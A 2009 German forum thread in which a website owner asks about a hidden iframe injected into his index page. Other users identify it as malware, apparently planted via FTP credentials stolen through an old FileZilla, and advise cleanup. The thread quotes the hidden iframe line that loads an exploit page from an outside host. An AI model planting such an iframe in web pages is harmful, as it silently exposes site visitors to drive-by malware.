Lifecounter.cn-Iframe mit Viruswarnung

**Ludger** · 04.08.2009, 09:02

Hallo,

kann mir jemand sagen, was

Code:

<iframe src="http://lifecounter.cn/p/index.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>

aus der index.php bewirkt? Erst einmal wirkt das auf mich "komisch".

Gruß
Ludger

**Torben** · 04.08.2009, 09:04

Hallo Ludger,

ich finde diese Codezeile unter http://lifecounter.cn gar nicht.

**nicobrain** · 04.08.2009, 09:05

also wenn deine Domain nicht gerade lifecounter ist dann würde ich fast behaupten wurdest du gehackt.
Hatte sowas mal mit nem anderen CMS.

sehr unfein ... letzteres sauberes Backup einspielen!

***lucina*** · 04.08.2009, 09:39

Kaspersky und andere melden mir bei der referenzierten Seite einen Trojaner:

04.08.2009 10:36:02 http://lifecounter.cn/p/index.php//index Firefox
Gefunden: HEUR:Exploit.Script.Generic

Fragt sich allerdings, wie das in Deine Installation hineinkommt. Wenn das so einfach ist, dann würde mich der Weg auch dringend interessieren.

Was für ein System fährst Du?

Carolina.

***Nina*** · 04.08.2009, 10:08

Mein Avira Pro meckert auf der Seite die Malware exp/swf.28992 an.

Klingt für mich auch nach einem typischen Hack vom Webspace. Gründe dafür gibt es viele:

Der ganze Server wurde z. B. aufgrund veralteter darauf laufender Software gehackt (erkennt man daran, wenn andere Webhosting-Kunden auf dem gleichen Server ebenfalls dieses Iframe aufweisen)
Dein Webspace wurde gehackt; liegt meist an unsicheren Scripts die sich irgendwo darauf befinden; oft z. B. veraltete oder selbst erstellte Scripte die nicht gegen XSS oder ähnlichen Lücken gesichert sind
geklaute FTP-Passwörter (z. B. über Fake-Seitenverlinkungen in Websites)

sq...... · 04.08.2009, 10:39

hi,

wenn du eine alte version *filezilla* nutzen solltest, ist das der grund. über ein leck konnten dort die hinterlegten ftp-zugänge ausspioniert werden.

folgendes wird auf dem account passieren:

nach und nach wird der unsichtbare iframe mit adlinks von google gefüllt , bis diese dann irgendwann der iframe mal freigestellt wird und deine indexseite damit überspühlt wird. bei klick gibt es dann ganz normal geld von google an die hacker

lösche den iframe und ändere die ftp-zugangsdaten. befallen sind in der regel nur index-dateien.

***lucina*** · 04.08.2009, 10:51

... würde mich persönlich eher interessieren, wie das konkret in diese Installation gekommen ist. Informationen dazu, auf welchem Webserver, mit welcher TL-Version, mit welcher benutzten Software, PHP- & MySQL-Version und in welcher Konfiguration fände ich extrem hilfreich.

Ich möchte schon wissen, ob das ein individuelles oder ein globales Problem ist. Ein grundsätzliches Problem (sprich: die Möglichkeit, TL-Installationen zu kompromittieren) möchte ich jedenfalls bei geschätzten 30 Kundenseiten nicht an der Backe haben.

Ludger, kannst Du bitte mal die entsprechenden Informationen posten? Danke!

Carolina.

sq...... · 04.08.2009, 11:46

hi lucina,

das ganze wurde vor einiger zeit schonmal diskutiert und es ist kein problem von TL !!! musste mal im alten forum schauen ... HIER

**Ludger** · 04.08.2009, 13:20

Hallo,

Zitat von squidi

wenn du eine alte version *filezilla* nutzen solltest, ist das der grund. über ein leck konnten dort die hinterlegten ftp-zugänge ausspioniert werden.

Wenns mit auch peinlich ist: Das ist dann wohl so. Hab ihn jetzt aktualisiert und die Zugangsdaten geändert. Danke für den Hinweis und die Erläuterungen. Die entsprechende Zeile hatte ich schon auskommentiert.

Gruß und Danke an alle
Ludger